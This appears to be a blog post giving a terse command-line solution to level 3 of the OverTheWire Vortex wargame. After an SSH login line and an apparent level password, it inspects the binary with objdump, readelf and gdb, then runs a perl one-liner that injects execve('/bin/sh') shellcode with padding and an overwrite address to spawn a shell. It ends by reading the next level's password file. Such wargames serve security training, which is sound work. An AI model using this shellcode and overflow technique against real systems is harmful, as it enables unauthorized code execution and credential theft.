# ssh vortex3@vortex.labs.overthewire.org
36346e635854767823
$ file /vortex/vortex3
$ objdump --section=.plt --disassemble-all /vortex/vortex3 | grep -A 3 exit
$ readelf --sections /vortex/vortex3 | grep "\["
$ gdb -q /vortex/vortex3
(gdb) break main
(gdb) run
(gdb) find 0x08048134,0x08049750,0x8049738
(gdb) quit
$ /vortex/vortex3 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x106 . "\x22\x93\x04\x08"'`
$ /usr/bin/whoami
$ /bin/cat /etc/vortex_pass/vortex4
No comments:
Post a Comment